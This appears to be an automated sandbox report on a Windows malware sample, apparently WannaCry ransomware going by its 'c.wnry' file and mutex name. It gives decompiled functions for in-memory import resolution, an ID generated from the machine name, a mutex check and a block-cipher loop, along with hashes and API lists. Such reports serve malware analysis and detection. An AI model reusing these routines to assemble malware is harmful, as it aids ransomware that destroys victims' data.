0x004078b7
0x004078be
0x004078c4
0x004078c8
0x004078dd
0x004078ca
0x004078ca
0x004078ca
0x004078e9
0x004078ee
0x004078f2
0x004078f8
0x004078fd
0x004078ff
0x00407902
0x00407903
0x00407904
0x0040790b

APIs

__setusermatherr.MSVCRT(0040793C), ref: 00407836

Part of subcall function 0040792A: _controlfp.MSVCRT(00010000,00030000,00407842), ref: 00407934

_initterm.MSVCRT(0040E008,0040E00C), ref: 0040784C
__getmainargs.MSVCRT(?,?,?,?,0040E008,0040E00C), ref: 0040786F
_initterm.MSVCRT(0040E000,0040E004), ref: 0040787F
GetStartupInfoA.KERNEL32(?), ref: 004078BE
GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 004078E2
exit.MSVCRT(00000000,00000000,?,?,?,?), ref: 004078F2
_XcptFilter.MSVCRT(?,?,?,?,?,?), ref: 00407904

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__setusermatherr_controlfpexit
String ID:
API String ID: 2141228402-0
Opcode ID: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
Instruction ID: 738ed170af38765147f9c33b7b7214e7a7d60aeb9597ff7827fffae83538cc25
Opcode Fuzzy Hash: e2abdc3946810ebb19c889ba728617f0f692a6676515e3c370649a79fa0f1872
Instruction Fuzzy Hash: F52135B2C04258AEEB20AFA5DD48AAD7BB8AF05304F24443FF581B7291D7786841CB59

Uniqueness

Uniqueness Score: -1.00%

Function 004027DF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 121
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E004027DF(signed int* _a4) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr* _t50;
				intOrPtr _t53;
				intOrPtr _t55;
				void* _t58;
				void _t60;
				signed int _t63;
				signed int _t67;
				intOrPtr _t68;
				void* _t73;
				signed int _t75;
				intOrPtr _t87;
				intOrPtr* _t88;
				intOrPtr* _t90;
				void* _t91;

				_t90 = _a4;
				_t2 = _t90 + 4; // 0x4be8563c
				_t87 =  *_t2;
				_t50 =  *_t90 + 0x80;
				_t75 = 1;
				_v16 = _t87;
				_v12 = _t75;
				if( *((intOrPtr*)(_t50 + 4)) != 0) {
					_t73 =  *_t50 + _t87;
					if(IsBadReadPtr(_t73, 0x14) != 0) {
						L25:
						return _v12;
					}
					while(1) {
						_t53 =  *((intOrPtr*)(_t73 + 0xc));
						if(_t53 == 0) {
							goto L25;
						}
						_t8 = _t90 + 0x30; // 0xc085d0ff
						_t55 =  *((intOrPtr*)(_t90 + 0x24))(_t53 + _t87,  *_t8);
						_v8 = _t55;
						if(_t55 == 0) {
							SetLastError(0x7e);
							L23:
							_v12 = _v12 & 0x00000000;
							goto L25;
						}
						_t11 = _t90 + 0xc; // 0x317459c0
						_t14 = _t90 + 8; // 0x85000001
						_t58 = realloc( *_t14, 4 +  *_t11 * 4);
						if(_t58 == 0) {
							_t40 = _t90 + 0x30; // 0xc085d0ff
							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t40);
							SetLastError(0xe);
							goto L23;
						}
						_t15 = _t90 + 0xc; // 0x317459c0
						 *(_t90 + 8) = _t58;
						 *((intOrPtr*)(_t58 +  *_t15 * 4)) = _v8;
						 *(_t90 + 0xc) =  *(_t90 + 0xc) + 1;
						_t60 =  *_t73;
						if(_t60 == 0) {
							_t88 = _t87 +  *((intOrPtr*)(_t73 + 0x10));
							_a4 = _t88;
						} else {
							_t88 =  *((intOrPtr*)(_t73 + 0x10)) + _v16;
							_a4 = _t60 + _t87;
						}
						while(1) {
							_t63 =  *_a4;
							if(_t63 == 0) {
								break;
							}
							if((_t63 & 0x80000000) == 0) {
								_t32 = _t90 + 0x30; // 0xc085d0ff
								_push( *_t32);
								_t67 = _t63 + _v16 + 2;
							} else {
								_t30 = _t90 + 0x30; // 0xc085d0ff
								_push( *_t30);
								_t67 = _t63 & 0x0000ffff;
							}
							_t68 =  *((intOrPtr*)(_t90 + 0x28))(_v8, _t67);
							_t91 = _t91 + 0xc;
							 *_t88 = _t68;
							if(_t68 == 0) {
								_v12 = _v12 & 0x00000000;
								break;
							} else {
								_a4 =  &(_a4[1]);
								_t88 = _t88 + 4;
								continue;
							}
						}
						if(_v12 == 0) {
							_t45 = _t90 + 0x30; // 0xc085d0ff
							 *((intOrPtr*)(_t90 + 0x2c))(_v8,  *_t45);
							SetLastError(0x7f);
							goto L25;
						}
						_t73 = _t73 + 0x14;
						if(IsBadReadPtr(_t73, 0x14) == 0) {
							_t87 = _v16;
							continue;
						}
						goto L25;
					}
					goto L25;
				}
				return _t75;
			}

0x004027e6
0x004027ee
0x004027ee
0x004027f1
0x004027f6
0x004027f7
0x004027fa
0x00402801
0x0040280d
0x0040281a
0x0040291c
0x00000000
0x0040291f
0x00402825
0x00402825
0x0040282a
0x00000000
0x00000000
0x00402830
0x00402836
0x0040283a
0x00402840
0x004028fd
0x004028fd
0x00402903
0x00000000
0x00402903
0x00402846
0x00402851
0x00402854
0x0040285e
0x004028f0
0x004028f6
0x004028fd
0x00000000
0x004028fd
0x00402864
0x0040286a
0x0040286d
0x00402870
0x00402873
0x00402877
0x00402889
0x0040288b
0x00402879
0x0040287e
0x00402881
0x00402881
0x0040288e
0x00402891
0x00402895
0x00000000
0x00000000
0x0040289c
0x004028ab
0x004028ab
0x004028b0
0x0040289e
0x0040289e
0x0040289e
0x004028a1
0x004028a1
0x004028b7
0x004028ba
0x004028bd
0x004028c1
0x004028cc
0x00000000
0x004028c3
0x004028c3
0x004028c7
0x00000000
0x004028c7
0x004028c1
0x004028d4
0x00402909
0x0040290f
0x00402916
0x00000000
0x00402916
0x004028d6
0x004028e4
0x00402822
0x00000000
0x00402822
0x00000000
0x004028ea
0x00000000
0x00402825
0x00000000

APIs

IsBadReadPtr.KERNEL32(00000000,00000014,00000000,00000001,00000000,?!@,004023F5,00000000), ref: 00402812
realloc.MSVCRT(85000001,317459C0), ref: 00402854
IsBadReadPtr.KERNEL32(-00000014,00000014), ref: 004028DC

Strings

?!@, xrefs: 004027DF

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: Read$realloc
String ID: ?!@
API String ID: 1241503663-708128716
Opcode ID: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
Instruction ID: b911edbb3638e6438919fa35cb7379f64586f657f287b8edbc273cd359ebb62a
Opcode Fuzzy Hash: 3ef8fdaf83090ca6dd9f312f51019f46009b35537f3f51f7116a8d4e5983476b
Instruction Fuzzy Hash: 4841AE76A00205EFDB109F55CE49B5ABBF4FF44310F24803AE846B62D1D7B8E900DB59

Uniqueness

Uniqueness Score: -1.00%

Function 00401225 Relevance: 10.6, APIs: 7, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00401225(intOrPtr _a4) {
				signed int _v8;
				long _v12;
				void _v410;
				long _v412;
				long _t34;
				signed int _t42;
				intOrPtr _t44;
				signed int _t45;
				signed int _t48;
				int _t54;
				signed int _t56;
				signed int _t60;
				signed int _t61;
				signed int _t62;
				void* _t71;
				signed short* _t72;
				void* _t76;
				void* _t77;

				_t34 =  *0x40f874; // 0x0
				_v412 = _t34;
				_t56 = 0x63;
				_v12 = 0x18f;
				memset( &_v410, 0, _t56 << 2);
				asm("stosw");
				GetComputerNameW( &_v412,  &_v12);
				_v8 = _v8 & 0x00000000;
				_t54 = 1;
				if(wcslen( &_v412) > 0) {
					_t72 =  &_v412;
					do {
						_t54 = _t54 * ( *_t72 & 0x0000ffff);
						_v8 = _v8 + 1;
						_t72 =  &(_t72[1]);
					} while (_v8 < wcslen( &_v412));
				}
				srand(_t54);
				_t42 = rand();
				_t71 = 0;
				asm("cdq");
				_t60 = 8;
				_t76 = _t42 % _t60 + _t60;
				if(_t76 > 0) {
					do {
						_t48 = rand();
						asm("cdq");
						_t62 = 0x1a;
						 *((char*)(_t71 + _a4)) = _t48 % _t62 + 0x61;
						_t71 = _t71 + 1;
					} while (_t71 < _t76);
				}
				_t77 = _t76 + 3;
				while(_t71 < _t77) {
					_t45 = rand();
					asm("cdq");
					_t61 = 0xa;
					 *((char*)(_t71 + _a4)) = _t45 % _t61 + 0x30;
					_t71 = _t71 + 1;
				}
				_t44 = _a4;
				 *(_t71 + _t44) =  *(_t71 + _t44) & 0x00000000;
				return _t44;
			}

0x0040122e
0x00401239
0x00401240
0x00401249
0x00401250
0x00401252
0x0040125f
0x0040126b
0x00401277
0x0040127e
0x00401280
0x00401286
0x00401289
0x0040128c
0x00401297
0x0040129d
0x00401286
0x004012a1
0x004012ae
0x004012b2
0x004012b4
0x004012b5
0x004012ba
0x004012be
0x004012c0
0x004012c0
0x004012c4
0x004012c5
0x004012ce
0x004012d1
0x004012d2
0x004012c0
0x004012d6
0x004012d9
0x004012dd
0x004012e1
0x004012e2
0x004012eb
0x004012ee
0x004012ee
0x004012f1
0x004012f4
0x004012fc

APIs

GetComputerNameW.KERNEL32(?,0000018F,?,?,00000000), ref: 0040125F
wcslen.MSVCRT(?,?,00000000), ref: 00401279
wcslen.MSVCRT(?,00000000), ref: 00401298
srand.MSVCRT(00000001,00000000), ref: 004012A1
rand.MSVCRT ref: 004012AE
rand.MSVCRT ref: 004012C0
rand.MSVCRT ref: 004012DD

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: rand$wcslen$ComputerNamesrand
String ID:
API String ID: 3058258771-0
Opcode ID: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
Instruction ID: 153b78e0bdef4b648922335b0398b7079fc1e42e5dbb3c53d325bf346215f47a
Opcode Fuzzy Hash: b0791ced207a07d975efd615d75f91e7379ad7fc4ff6fb2c179a53625b9ec986
Instruction Fuzzy Hash: FA212833A00318ABD7119B65ED81BDD77A8EB45354F1100BBF948F71C0CA759EC28BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00407070 Relevance: 10.6, APIs: 7, Instructions: 74
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407070(char* _a4, char* _a8) {
				char _v264;
				void _v524;
				long _t16;
				char* _t30;
				char* _t31;
				char* _t36;
				char* _t38;
				int _t40;
				void* _t41;

				_t30 = _a4;
				if(_t30 != 0 && GetFileAttributesA(_t30) == 0xffffffff) {
					CreateDirectoryA(_t30, 0);
				}
				_t36 = _a8;
				_t16 =  *_t36;
				if(_t16 != 0) {
					_t38 = _t36;
					_t31 = _t36;
					do {
						if(_t16 == 0x2f || _t16 == 0x5c) {
							_t38 = _t31;
						}
						_t16 = _t31[1];
						_t31 =  &(_t31[1]);
					} while (_t16 != 0);
					if(_t38 != _t36) {
						_t40 = _t38 - _t36;
						memcpy( &_v524, _t36, _t40);
						 *(_t41 + _t40 - 0x208) =  *(_t41 + _t40 - 0x208) & 0x00000000;
						E00407070(_t30,  &_v524);
					}
					_v264 = _v264 & 0x00000000;
					if(_t30 != 0) {
						strcpy( &_v264, _t30);
					}
					strcat( &_v264, _t36);
					_t16 = GetFileAttributesA( &_v264);
					if(_t16 == 0xffffffff) {
						return CreateDirectoryA( &_v264, 0);
					}
				}
				return _t16;
			}

0x0040707a
0x00407080
0x00407091
0x00407091
0x00407097
0x0040709a
0x0040709e
0x004070a5
0x004070a7
0x004070a9
0x004070ab
0x004070b1
0x004070b1
0x004070b3
0x004070b6
0x004070b7
0x004070bd
0x004070bf
0x004070ca
0x004070cf
0x004070df
0x004070e4
0x004070e7
0x004070f1
0x004070fb
0x00407101
0x0040710a
0x00407118
0x00407121
0x00000000
0x0040712c
0x00407121
0x00407135

APIs

GetFileAttributesA.KERNEL32(?,?,?), ref: 00407083
CreateDirectoryA.KERNEL32(?,00000000), ref: 00407091
memcpy.MSVCRT(?,0000002F,0000002F,?,?,?), ref: 004070CA
strcpy.MSVCRT(00000000,?,?,?), ref: 004070FB
strcat.MSVCRT(00000000,0000002F,?,?), ref: 0040710A
GetFileAttributesA.KERNEL32(00000000,?,?), ref: 00407118
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 0040712C

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: AttributesCreateDirectoryFile$memcpystrcatstrcpy
String ID:
API String ID: 2935503933-0
Opcode ID: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
Instruction ID: 50ba023859918e707bf45bf33fbe73a6a33da9a39eec2eddc6b78618a8cc3524
Opcode Fuzzy Hash: 0838382564994867704b48d197d9141456e9ef10b941a736ac2fad3accdc9566
Instruction Fuzzy Hash: 1A112B72C0821456CB305B749D88FD7776C9B11320F1403BBE595B32C2DA78BD898669

Uniqueness

Uniqueness Score: -1.00%

Function 00401EFF Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401EFF(intOrPtr _a4) {
				char _v104;
				void* _t9;
				void* _t11;
				void* _t12;

				sprintf( &_v104, "%s%d", "Global\\MsWinZonesCacheCounterMutexA", 0);
				_t12 = 0;
				if(_a4 <= 0) {
					L3:
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t9 = OpenMutexA(0x100000, 1,  &_v104);
					if(_t9 != 0) {
						break;
					}
					Sleep(0x3e8);
					_t12 = _t12 + 1;
					if(_t12 < _a4) {
						continue;
					}
					goto L3;
				}
				CloseHandle(_t9);
				_t11 = 1;
				return _t11;
			}

0x00401f16
0x00401f1c
0x00401f24
0x00401f4c
0x00000000
0x00000000
0x00000000
0x00000000
0x00401f26
0x00401f26
0x00401f31
0x00401f39
0x00000000
0x00000000
0x00401f40
0x00401f46
0x00401f4a
0x00000000
0x00000000
0x00000000
0x00401f4a
0x00401f52
0x00401f5a
0x00000000

APIs

sprintf.MSVCRT(?,%s%d,Global\MsWinZonesCacheCounterMutexA,00000000), ref: 00401F16
OpenMutexA.KERNEL32(00100000,00000001,?), ref: 00401F31
Sleep.KERNEL32(000003E8), ref: 00401F40
CloseHandle.KERNEL32(00000000), ref: 00401F52

Strings

Global\MsWinZonesCacheCounterMutexA, xrefs: 00401F08
%s%d, xrefs: 00401F10

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: CloseHandleMutexOpenSleepsprintf
String ID: %s%d$Global\MsWinZonesCacheCounterMutexA
API String ID: 2780352083-2959021817
Opcode ID: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
Instruction ID: f4a3b48a0bafa41ae68b0177be176e29d76f271436d11399ade0a1af8f7a19ee
Opcode Fuzzy Hash: d195781efe0b704a0c45d33d3827b966fde6c598e7eccee7cfdb972a19423a06
Instruction Fuzzy Hash: 92F0E931A40305BBDB20EBA49E4AB9B7758AB04B40F104036F945FA0D2DBB8D54586D8

Uniqueness

Uniqueness Score: -1.00%

Function 00403A77 Relevance: 9.1, APIs: 6, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00403A77(void* __ecx, void* _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				void* _v12;
				char _v16;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v48;
				signed int _t121;
				int _t124;
				intOrPtr* _t126;
				intOrPtr _t127;
				int _t131;
				intOrPtr* _t133;
				intOrPtr _t135;
				intOrPtr _t137;
				signed int _t139;
				signed int _t140;
				signed int _t143;
				signed int _t150;
				intOrPtr _t160;
				int _t161;
				int _t163;
				signed int _t164;
				signed int _t165;
				intOrPtr _t168;
				void* _t169;
				signed int _t170;
				signed int _t172;
				signed int _t175;
				signed int _t178;
				intOrPtr _t194;
				void* _t195;
				void* _t196;
				void* _t197;
				intOrPtr _t198;
				void* _t201;

				_t197 = __ecx;
				if( *((intOrPtr*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v16);
					L0040776E();
				}
				_t121 = _a12;
				if(_t121 == 0) {
					L15:
					__imp__??0exception@@QAE@ABQBD@Z(0x40f574);
					_push(0x40d570);
					_push( &_v16);
					L0040776E();
					_push( &_v16);
					_push(0);
					_push(_t197);
					_t198 = _v36;
					_t194 = _v32;
					_t168 =  *((intOrPtr*)(_t198 + 0x30));
					_t160 =  *((intOrPtr*)(_t198 + 0x34));
					_t71 = _t194 + 0xc; // 0x40d568
					_v48 =  *_t71;
					_v32 = _t168;
					if(_t168 > _t160) {
						_t160 =  *((intOrPtr*)(_t198 + 0x2c));
					}
					_t75 = _t194 + 0x10; // 0x19930520
					_t124 =  *_t75;
					_t161 = _t160 - _t168;
					if(_t161 > _t124) {
						_t161 = _t124;
					}
					if(_t161 != 0 && _a8 == 0xfffffffb) {
						_a8 = _a8 & 0x00000000;
					}
					 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t161;
					 *(_t194 + 0x10) = _t124 - _t161;
					_t126 =  *((intOrPtr*)(_t198 + 0x38));
					if(_t126 != 0) {
						_t137 =  *_t126( *((intOrPtr*)(_t198 + 0x3c)), _t168, _t161);
						 *((intOrPtr*)(_t198 + 0x3c)) = _t137;
						_t201 = _t201 + 0xc;
						 *((intOrPtr*)(_t194 + 0x30)) = _t137;
					}
					if(_t161 != 0) {
						memcpy(_v12, _a4, _t161);
						_v12 = _v12 + _t161;
						_t201 = _t201 + 0xc;
						_a4 = _a4 + _t161;
					}
					_t127 =  *((intOrPtr*)(_t198 + 0x2c));
					if(_a4 == _t127) {
						_t169 =  *((intOrPtr*)(_t198 + 0x28));
						_a4 = _t169;
						if( *((intOrPtr*)(_t198 + 0x34)) == _t127) {
							 *((intOrPtr*)(_t198 + 0x34)) = _t169;
						}
						_t99 = _t194 + 0x10; // 0x19930520
						_t131 =  *_t99;
						_t163 =  *((intOrPtr*)(_t198 + 0x34)) - _t169;
						if(_t163 > _t131) {
							_t163 = _t131;
						}
						if(_t163 != 0 && _a8 == 0xfffffffb) {
							_a8 = _a8 & 0x00000000;
						}
						 *((intOrPtr*)(_t194 + 0x14)) =  *((intOrPtr*)(_t194 + 0x14)) + _t163;
						 *(_t194 + 0x10) = _t131 - _t163;
						_t133 =  *((intOrPtr*)(_t198 + 0x38));
						if(_t133 != 0) {
							_t135 =  *_t133( *((intOrPtr*)(_t198 + 0x3c)), _t169, _t163);
							 *((intOrPtr*)(_t198 + 0x3c)) = _t135;
							_t201 = _t201 + 0xc;
							 *((intOrPtr*)(_t194 + 0x30)) = _t135;
						}
						if(_t163 != 0) {
							memcpy(_v12, _a4, _t163);
							_v12 = _v12 + _t163;
							_a4 = _a4 + _t163;
						}
					}
					 *(_t194 + 0xc) = _v12;
					 *((intOrPtr*)(_t198 + 0x30)) = _a4;
					return _a8;
				} else {
					_t170 =  *(_t197 + 0x3cc);
					if(_t121 % _t170 != 0) {
						goto L15;
					} else {
						if(_a16 != 1) {
							_t195 = _a4;
							_t139 = _a12;
							_a16 = 0;
							_t164 = _a8;
							if(_a16 != 2) {
								_t140 = _t139 / _t170;
								if(_t140 > 0) {
									do {
										E00403797(_t197, _t195, _t164);
										_t172 =  *(_t197 + 0x3cc);
										_t195 = _t195 + _t172;
										_t143 = _a12 / _t172;
										_t164 = _t164 + _t172;
										_a16 = _a16 + 1;
									} while (_a16 < _t143);
									return _t143;
								}
							} else {
								_t140 = _t139 / _t170;
								if(_t140 > 0) {
									do {
										E0040350F(_t197, _t197 + 0x3f0, _t164);
										E00403A28(_t197, _t164, _t195);
										memcpy(_t197 + 0x3f0, _t195,  *(_t197 + 0x3cc));
										_t175 =  *(_t197 + 0x3cc);
										_t201 = _t201 + 0xc;
										_t150 = _a12 / _t175;
										_t195 = _t195 + _t175;
										_t164 = _t164 + _t175;
										_a16 = _a16 + 1;
									} while (_a16 < _t150);
									return _t150;
								}
							}
						} else {
							_t196 = _a4;
							_t140 = _a12 / _t170;
							_a16 = 0;
							_t165 = _a8;
							if(_t140 > 0) {
								do {
									E00403797(_t197, _t196, _t165);
									E00403A28(_t197, _t165, _t197 + 0x3f0);
									memcpy(_t197 + 0x3f0, _t196,  *(_t197 + 0x3cc));
									_t178 =  *(_t197 + 0x3cc);
									_t201 = _t201 + 0xc;
									_t140 = _a12 / _t178;
									_t196 = _t196 + _t178;
									_t165 = _t165 + _t178;
									_a16 = _a16 + 1;
								} while (_a16 < _t140);
							}
						}
						return _t140;
					}
				}
			}

0x00403a7f
0x00403a87
0x00403a91
0x00403a9a
0x00403a9f
0x00403aa0
0x00403aa0
0x00403aa5
0x00403aaa
0x00403bba
0x00403bc2
0x00403bcb
0x00403bd0
0x00403bd1
0x00403bd9
0x00403bda
0x00403bdb
0x00403bdc
0x00403be0
0x00403be3
0x00403be6
0x00403be9
0x00403bee
0x00403bf1
0x00403bf4
0x00403bf6
0x00403bf6
0x00403bf9
0x00403bf9
0x00403bfc
0x00403c00
0x00403c02
0x00403c02
0x00403c06
0x00403c0e
0x00403c0e
0x00403c12
0x00403c17
0x00403c1a
0x00403c1f
0x00403c26
0x00403c28
0x00403c2b
0x00403c2e
0x00403c2e
0x00403c33
0x00403c3c
0x00403c41
0x00403c44
0x00403c47
0x00403c47
0x00403c4a
0x00403c50
0x00403c52
0x00403c58
0x00403c5b
0x00403c5d
0x00403c5d
0x00403c63
0x00403c63
0x00403c66
0x00403c6a
0x00403c6c
0x00403c6c
0x00403c70
0x00403c78
0x00403c78
0x00403c7c
0x00403c81
0x00403c84
0x00403c89
0x00403c90
0x00403c92
0x00403c95
0x00403c98
0x00403c98
0x00403c9d
0x00403ca6
0x00403cab
0x00403cb1
0x00403cb1
0x00403c9d
0x00403cb7
0x00403cbd
0x00403cc7
0x00403ab0
0x00403ab0
0x00403abc
0x00000000
0x00403ac2
0x00403ac6
0x00403b2c
0x00403b2f
0x00403b32
0x00403b35
0x00403b38
0x00403b8d
0x00403b91
0x00403b93
0x00403b97
0x00403b9c
0x00403ba7
0x00403ba9
0x00403bab
0x00403bad
0x00403bb0
0x00000000
0x00403b93
0x00403b3a
0x00403b3c
0x00403b40
0x00403b42
0x00403b4c
0x00403b55
0x00403b68
0x00403b6d
0x00403b78
0x00403b7b
0x00403b7d
0x00403b7f
0x00403b81
0x00403b84
0x00000000
0x00403b42
0x00403b40
0x00403ac8
0x00403acb
0x00403ace
0x00403ad0
0x00403ad3
0x00403ad8
0x00403ada
0x00403ade
0x00403aed
0x00403b00
0x00403b05
0x00403b10
0x00403b13
0x00403b15
0x00403b17
0x00403b19
0x00403b1c
0x00403ada
0x00403ad8
0x00403b25
0x00403b25
0x00403abc

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,00000001), ref: 00403A91
_CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403AA0
memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B00
memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 00403B68
??0exception@@QAE@ABQBD@Z.MSVCRT(0040F574,?,?,?,?,?,00000001), ref: 00403BC2
_CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,00000001), ref: 00403BD1

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrowmemcpy
String ID:
API String ID: 2382887404-0
Opcode ID: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
Instruction ID: 9805a50700f74263afb1320d00d27f30e93ca80038ec105a2d2f515762341bf2
Opcode Fuzzy Hash: 8f0cb0103d3614fdc28d84a5f541c19cbd02f6e6265a1098423f4cf3f0921468
Instruction Fuzzy Hash: 8541C870B40206ABDB14DE65DD81D9B77BEEB84309B00443FF815B3281D778AB15C759

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 38fileCOMMON

Download Yara Rule

APIs

fopen.MSVCRT(c.wnry,0040E018), ref: 0040101B
fread.MSVCRT(?,0000030C,00000001,00000000), ref: 0040103F
fwrite.MSVCRT(?,0000030C,00000001,00000000), ref: 00401047
fclose.MSVCRT(00000000), ref: 00401058

Strings

c.wnry, xrefs: 00401016

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: fclosefopenfreadfwrite
String ID: c.wnry
API String ID: 4000964834-3240288721
Opcode ID: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
Instruction ID: 4fc4ee2583eead98f325da0eb4a8e2a7a7827d82b7f69226d67b1691b23a23d5
Opcode Fuzzy Hash: 83356dae967f3845aa64eafaf8b7e6f79fd4dc7784855bee587f11601882f661
Instruction Fuzzy Hash: 0CF05931204260ABCA301F656D4AA277B10DBC4F61F10083FF1C1F40E2CABD44C296BE

Uniqueness

Uniqueness Score: -1.00%

Function 004018F9 Relevance: 7.6, APIs: 5, Instructions: 79
filememoryCOMMON

Download Yara Rule

C-Code - Quality: 24%

			E004018F9(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				struct _OVERLAPPED* _v8;
				char _v20;
				long _v32;
				struct _OVERLAPPED* _v36;
				long _v40;
				signed int _v44;
				void* _t18;
				void* _t28;
				long _t34;
				intOrPtr _t38;

				_push(0xffffffff);
				_push(0x4081f0);
				_push(0x4076f4);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t38;
				_v44 = _v44 | 0xffffffff;
				_v32 = 0;
				_v36 = 0;
				_v8 = 0;
				_t18 = CreateFileA(_a12, 0x80000000, 1, 0, 3, 0, 0);
				_v44 = _t18;
				if(_t18 != 0xffffffff) {
					_t34 = GetFileSize(_t18, 0);
					_v40 = _t34;
					if(_t34 != 0xffffffff && _t34 <= 0x19000) {
						_t28 = GlobalAlloc(0, _t34);
						_v36 = _t28;
						if(_t28 != 0 && ReadFile(_v44, _t28, _t34,  &_v32, 0) != 0) {
							_push(_a8);
							_push(0);
							_push(0);
							_push(_v32);
							_push(_t28);
							_push(_a4);
							if( *0x40f898() != 0) {
								_push(1);
								_pop(0);
							}
						}
					}
				}
				_push(0xffffffff);
				_push( &_v20);
				L004076FA();
				 *[fs:0x0] = _v20;
				return 0;
			}

0x004018fc
0x004018fe
0x00401903
0x0040190e
0x0040190f
0x0040191c
0x00401922
0x00401925
0x00401928
0x0040193a
0x00401940
0x00401946
0x00401950
0x00401952
0x00401958
